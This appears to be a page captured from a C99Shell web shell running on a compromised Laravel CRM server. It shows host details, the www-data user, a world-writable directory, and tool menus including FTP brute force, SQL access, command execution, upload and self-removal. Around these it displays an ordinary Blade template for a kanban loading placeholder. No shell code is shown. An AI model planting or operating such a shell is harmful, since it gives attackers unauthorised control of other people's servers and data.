!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/laravel-crm/packages/Webkul/Admin/src/Resources/views/components/shimmer/leads/index/   drwxrwxrwx
Free 13.2 GB of 57.97 GB (22.77%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     kanban.blade.php (2.71 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<x-admin::shimmer.leads.index.kanban.toolbar />

<div class="flex gap-2.5 overflow-x-auto">
    <!-- Stages -->
    @for ($i = 1; $i <= 6; $i++)
        <div class="flex min-w-[275px] max-w-[275px] flex-col gap-1 rounded-lg border border-gray-200 bg-white dark:border-gray-800 dark:bg-gray-900">
            <!-- Stage Header -->
            <div class="flex flex-col px-2 py-3">
                <div class="flex items-center justify-between">
                    <div class="shimmer h-4 w-20"></div>
                    <div class="shimmer h-[26px] w-[26px] rounded-md"></div>
                </div>

                <div class="flex items-center justify-between gap-2">
                    <div class="shimmer h-4 w-14"></div>
                    <div class="shimmer h-1 w-36"></div>
                </div>
            </div>

            <!-- Stage Lead Cards -->
            <div class="flex h-[calc(100vh-317px)] flex-col gap-2 overflow-y-auto p-2">
                @for ($j = 1; $j <= 3; $j++)
                    <!-- Card -->
                    <div class="flex w-full flex-col gap-5 rounded-md border border-gray-100 p-2 dark:border-gray-800">
                        <!-- Header -->
                        <div class="flex items-start justify-between">
                            <div class="flex items-center gap-1">
                                <!-- Avatar -->
                                <div class="shimmer h-9 w-9 rounded-full"></div>

                                <!-- Name and Organization -->
                                <div class="flex flex-col gap-0.5">
                                    <div class="shimmer h-4 w-20"></div>
                                    <div class="shimmer h-[15px] w-12"></div>
                                </div>
                            </div>

                            <!-- Rotten Lead Info -->
                            <div class="shimmer h-5 w-5 rounded-md"></div>
                        </div>

                        <!-- Body -->
                        <div class="flex flex-col gap-0.5">
                            <div class="shimmer h-4 w-full"></div>
                            <div class="shimmer h-4 w-1/2"></div>
                        </div>

                        <!-- Footer -->
                        <div class="flex flex-wrap gap-1">
                            <div class="shimmer h-6 w-16 rounded-xl"></div>
                            <div class="shimmer h-6 w-16 rounded-xl"></div>
                            <div class="shimmer h-6 w-16 rounded-xl"></div>
                            <div class="shimmer h-6 w-16 rounded-xl"></div>
                        </div>
                    </div>
                @endfor
            </div>
        </div>
    @endfor
</div>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0072 ]--